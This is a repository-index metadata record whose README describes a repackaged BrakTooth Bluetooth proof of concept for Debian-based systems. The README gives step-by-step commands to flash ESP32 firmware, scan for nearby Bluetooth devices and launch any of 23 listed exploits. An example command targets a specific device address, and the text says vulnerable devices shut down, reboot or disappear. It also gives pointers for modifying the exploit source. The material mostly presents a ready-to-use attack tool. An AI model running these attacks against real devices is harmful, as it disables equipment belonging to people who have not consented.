{"id":26901961,"url":"https://github.com/malwarekid/braktooth-kali-linux","last_synced_at":"2025-04-01T09:08:58.828Z","repository":{"id":204482447,"uuid":"711942484","full_name":"malwarekid/BrakTooth-Kali-Linux","owner":"malwarekid","description":null,"archived":false,"fork":false,"pushed_at":"2024-04-11T04:05:20.000Z","size":17,"stargazers_count":4,"open_issues_count":0,"forks_count":0,"subscribers_count":1,"default_branch":"main","last_synced_at":"2024-04-11T05:48:47.526Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":null,"language":null,"has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/malwarekid.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null}},"created_at":"2023-10-30T13:38:44.000Z","updated_at":"2024-04-11T05:48:47.526Z","dependencies_parsed_at":"2023-11-13T02:26:48.318Z","dependency_job_id":"61a43504-ee25-424c-a9a4-156157dcf0bb","html_url":"https://github.com/malwarekid/BrakTooth-Kali-Linux","commit_stats":null,"previous_names":["itzcloudyy/braktooth-kali-linux","scriptkiddieeee/braktooth-kali-linux","malwarekid/braktooth-kali-linux"],"tags_count":2,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/malwarekid%2FBrakTooth-Kali-Linux","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/malwarekid%2FBrakTooth-Kali-Linux/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/malwarekid%2FBrakTooth-Kali-Linux/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/malwarekid%2FBrakTooth-Kali-Linux/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/malwarekid","download_url":"https://codeload.github.com/malwarekid/BrakTooth-Kali-Linux/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":246612479,"owners_count":20805355,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":[],"created_at":"2025-04-01T09:08:58.205Z","updated_at":"2025-04-01T09:08:58.813Z","avatar_url":"https://github.com/malwarekid.png","language":null,"funding_links":[],"categories":[],"sub_categories":[],"readme":"\n\n# BrakTooth Proof of Concept\n\n\n## 1) Requirements\n\n[**BrakTooth**](https://www.braktooth.com/) requires a specific BT hardware development kit (**ESP-WROVER-KIT**) to be able to launch the attack since LMP packets cannot be sent from the host in normal Bluetooth Hardware.\n\n* ##### **Maked for all debian based distros** \n\n* ##### Hardware Board: **ESP-WROVER-KIT or esp32 and esp-prog**\n\n## 2) Installation Instructions\n\n##### A) Install (flash) PoC firmware on ESP-WROVER-KIT\n\nFirst, connect **ESP32-WROVER-KIT** to your PC. You can check if two serial ports were added by running `ls /dev/ttyUSB*`. Normally, **ESP32-WROVER-KIT** adds two serial ports such as `/dev/ttyUSB0` and `/dev/ttyUSB1`. We want the second serial port, which is used for serial communication with **ESP32**.\n\n```bash\nsudo apt install unzip python3-dev\nsudo bash braktooth/wdissector/libs.sh\nunzip esp32driver.zip # Extract esp32driver.zip (firmware package)\npython3 release/firmware.py flash /dev/ttyUSB1 # Please change your serial port to match your ESP32 device.\n# You may need to press and hold the \"Boot\" button during the flashing process.\ncd ../\n```\n\n##### B) Extract wdissector package and install system requirements\n\n```bash\ncd wdissector\n# It installs python3, nodejs, and system packages using apt-get and fix all libs\nsudo bash requirements.sh\n```\n\n\n\n## 3) Running BT fuzzer\n\nYou can start the fuzzer as follows:\n\n```bash\nsudo bin/bt_fuzzer --scan # Scan for targets (BDAddress) for 15 seconds\nsudo bin/bt_fuzzer # Start fuzzer with graphical user interface (GUI)\nsudo bin/bt_fuzzer --no-gui --autostart --target=E8:D0:3C:94:2C:66  # Start fuzzer without GUI  \n```\n\n#### BT Command line options\n\n```bash\nsudo bin/bt_fuzzer --help\nBluetooth Classic Fuzzer (Baseband, LMP, L2CAP, etc)\nUsage:\n  BT Fuzzer [OPTION...]\n\n      --help               Print help\n      --default-config     Start with default config\n      --autostart          Automatically start (default: true)\n      --no-gui             Start without GUI\n      --test-webview       Test GUI webview performance (requires internet)\n      --live-capture       Open wireshark in live capture mode\n      --exploit [=arg(=)]  Exploit Name\n      --list-exploits      List all exploits\n      --host arg           Host BDAddress\n      --host-port arg      Host serial port name of BT Interface \n                           (ESP-WROVER-KIT)\n      --random_bdaddress   Enable/Disable host BDAddress randomization\n      --target arg         Target BDAddress (default: /dev/ttyUSB1)\n      --target-port arg    Target serial port name to detect crashes \n                           (default: /dev/ttyUSB2)\n      --target-baud arg    Target baud rate (default: 115200)\n      --bounding           Enable/Disable Bounding (default: true)\n      --iocap arg          IO Capabilities (default: 3)\n      --authreq arg        Authentication Request flag (default: 3)\n      --scan               Scan BT Targets\n```\n\n\n\n## 3.1) Running Experimental Fuzzers:\n\n#### Wi-Fi AP Fuzzer\n\nWi-Fi AP Fuzzer requires use of [Alpha AWUS036AC Wi-Fi Dongle](https://www.amazon.com/Alfa-Long-Range-Dual-Band-Wireless-External/dp/B00MX57AO4/ref=sr_1_5?crid=3PN2VX74493Y3\u0026keywords=AWUS036AC\u0026qid=1643284766\u0026sprefix=alpha+awus036ac%2Caps%2C310\u0026sr=8-5) and installation of our custom driver for it:\n`cd src/drivers/wifi/rtl8812au \u0026\u0026 make -j4`. Then, the Wi-FI AP fuzzer will load the custom driver on program startup:\n\n```bash\nsudo bin/wifi_ap_fuzzer # Start fuzzer without graphical interface\n```\n\n* Wi-Fi options such as SSID, password, authentication and channel can be changed on `configs/wifi_ap_config.json`. \n* Note that the parameter `WifiInterface` must match your dongle interface name, which is usually **wlan1**. \n* By default, the fuzzer run its main thread on the core defined by the parameter `MainThreadCore=2`. Make sure to change this parameter value if you prefer to run the fuzzer in a different core.\n* Logs are saved on folder `logs/wifi_ap`\n\n##### Wi-Fi AP Command line options\n\n```bash\nWi-Fi AP 802.11 Fuzzer (MAC, LLC, SNAP, EAPoL, etc)\nUsage:\n  Wi-Fi AP Fuzzer [OPTION...]\n\n      --help               Print help\n      --default-config     Start with default config\n      --autostart          Automatically start (default: true)\n      --exploit [=arg(=)]  Exploit Name\n      --fuzz               Enable/Disable fuzzing (default: true)\n```\n\n\n\n#### BLE Host Fuzzer\n\nBLE Host fuzzer uses the same ESP32 development kit and can be run via the command\n\n```bash\nsudo bin/bthost_fuzzer # Start fuzzer without graphical interface\n```\n\n* Logs are saved on folder `logs/BTHost`\n\n\n\n## 4) BT Exploits Usage Instructions\n\n**Note:  For now, \u003cu\u003eNon-compliance\u003c/u\u003e tests may not work for any BT device. We will improve the non-compliance scripts to validate generic BT devices as well as include more details on such tests during the upcoming weeks.**\n\n\n\n### List Exploits\n\nBT Exploiter has several exploits which can be listed by running the following command:\n\n```bash\nsudo bin/bt_exploiter --list-exploits # Run as root\n\nAvailable Exploits:\n--\u003e 'invalid_timing_accuracy'\n--\u003e 'repeated_host_connection'\n--\u003e 'sdp_unkown_element_type'\n--\u003e 'knob'\n--\u003e 'au_rand_flooding'\n--\u003e 'lmp_max_slot_overflow'\n--\u003e 'duplicated_encapsulated_payload'\n--\u003e 'feature_response_flooding'\n--\u003e 'lmp_overflow_dm1'\n--\u003e 'invalid_feature_page_execution'\n--\u003e 'feature_req_ping_pong'\n--\u003e 'truncated_sco_link_request'\n--\u003e 'paging_scan_disable'\n--\u003e 'invalid_max_slot'\n--\u003e 'truncated_lmp_accepted'\n--\u003e 'invalid_setup_complete'\n--\u003e 'duplicated_iocap'\n--\u003e 'lmp_auto_rate_overflow'\n--\u003e 'lmp_overflow_2dh1'\n--\u003e 'noncompliance_invalid_stop_encryption'\n--\u003e 'wrong_encapsulated_payload'\n--\u003e 'noncomplicance_duplicated_encryption_request'\n--\u003e 'sdp_oversized_element_size'\n```\n\n\n\n### Scan target\n\nBefore launching the attack, you need to know the `BDAddress` of the target BT device. To facilitate this, BT Exploiter can scan the `BDAddress` of targets nearby by running the following command:\n\n```bash\nsudo bin/bt_exploiter --scan\n```\n\nIf **ESP32** is detected by bt_exploiter and scanning works, then you should get a similar output to the Figure below.\n\n![](./docs/scan_output.png)\n\n\n\n### Launch the Attack!\n\nNow it is your turn! Choose an exploit by its name and remember the target `BDAddress` where the exploit needs to be launched. You need to specify both the name of the exploit and the target `BDAddress` as follows to launch the respective attack:\n\n```bash\nsudo bin/bt_exploiter --host-port=/dev/ttyUSB1 --target=\u003ctarget bdaddress\u003e --exploit=\u003cexploit name\u003e\n```\n\nThe argument  `--target` is your target `BDAddress` and `--host-port` must match with the correct ESP32-WROVER-KIT serial port.\n\nFor example, launching the exploit for **LMP AU Rand Flooding** (au_rand_flooding) can be accomplished as follows:\n\n```bash\nsudo bin/bt_exploiter --host-port=/dev/ttyUSB1 --target=a4:50:46:59:0c:90 --exploit=au_rand_flooding\n```\n\nIf the target is vulnerable, then you should get some anomalous behavior from the target (shutdown, reboot, etc) or simply not be able to discover it anymore when scanning for BT targets again. \n\n**An example of a successful attack output for a vulnerable target that shuts down after the attack is presented below.**\n\n\u003cimg src=\"./docs/example_attack.png\" style=\"zoom:50%;\" /\u003e\n\n\n\n### Modify Exploits (Tutorial)\n\nThe source code of all exploits (C/C++) is included in folder **`modules/exploits`**. Any change to an existing exploit or new file that you add in this folder will be automatically identified and compiled the next time you run `bt_fuzzer` or `bt_exploiter`. \n\nFor more details on how to create BT exploits, please read **`exploit_modules_tutorial.pdf`** included in this repository.\n\n\n\n### exploiter\n\n\n\n### Opening the capture files in Wireshark\n\nThe exploit tool includes a standalone version of **Wireshark** which already includes a plugin to read the customized captures saved by our tool.\n\nCapture files are automatically saved in folder `logs/Bluetooth/capture_bluetooth.pcapng`. To open it via the custom Wireshark, run the following on the root folder of the exploiter (**bin** folder must be present on your working directory):\n\n```bash\n./bin/wireshark logs/Bluetooth/capture_bluetooth.pcapng\n```\n\nYou should see the following if the capture file was generated correctly:\n\n### wireshark\n\n\n\n### Advanced BT Options\n\nThe exploiter BT options are loaded from `configs/bt_config.json` on the following attributes:\n\n```json\n{\n    \"config\": {\n        \"Bluetooth\": {\n            // BT Options\n            \"EnableBounding\": true,\n            \"AuthReq\": 4,        \n            \"DisableRoleSwitch\": true,\n            \"IOCap\": 3,\n            \"Pin\": \"0000\",\n            \"TargetBDAddress\": \"E0:D4:E8:19:C7:69\",\n            // TODO: Store a list of targets\n            \"TargetBDAddressList\": [  \n                \"24:0A:C4:61:1C:1A\",\n                \"E0:D4:E8:19:C7:69\"\n            ]\n            // ...\n     }\n  // ...\n}\n```\n\n- **Save Captures** - When option is enabled, capture file is saved on `logs/Bluetooth/capture_bluetooth.pcapng`\n\n- **Scan** - Scan for BT targets\n\n- **BT Program** - Programs or \"Profiles\" which connect with a target device or wait for a connection. The available BT programs are available on the table below:\n\n  | BT Program           | Connection Type    | PROFILE      |\n  | -------------------- | ------------------ | ------------ |\n  | bin/sdp_rfcomm_query | Initiator / Master | SDP / RFCOMM |\n\n- **Target BDADDR** - Target of the device to connect. Only applied for BT programs which **initiates** the connection. This is not applied for programs that wait for connections such as `bin/spp_counter` or `bin/a2dp_sink_demo`.\n\n\n### Security Options\n\n- **Enable Bounding** - Enabled BT Pairing. If disabled, then all the next options have no effect.\n- **Disable Role Switch** (Checkbox) - Forces connection to reject any attempts to perform role switching. This ensures that once the master connects to a slave, their roles stay the same during the session. Exploits such as KNOB require this for the master (being the fuzzer) to mutate the `LMP_max_encryption_key_size_req` packet. **Disable this options if the slave does not accept the connection without role switching.**\n- **IO Capabilities** - Selects IO capabilities of the fuzzer during the pairing process according to the following:\n  - Display Only = 0\n  - Display Yes No = 1\n  - Keyboard Only = 2\n  - No Input No Output = 3 (Default)\n  - Unknown = 256\n- **Auth. Requirements** - Flag which indicates the authentication parameters during the pairing process.\n  - No MitM, No Bouding = 0\n  - MitM, No Bouding = 1\n  - No MitM, Dedicated Bouding = 2\n  - MitM, Dedicated Bouding = 3\n  - No MitM, General Bouding = 4\n  - MitM, General Bouding = 5\n- **PIN** - 4 digit PIN number to be used during pairing (legacy pairing method).\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fmalwarekid%2Fbraktooth-kali-linux","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fmalwarekid%2Fbraktooth-kali-linux","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fmalwarekid%2Fbraktooth-kali-linux/lists"}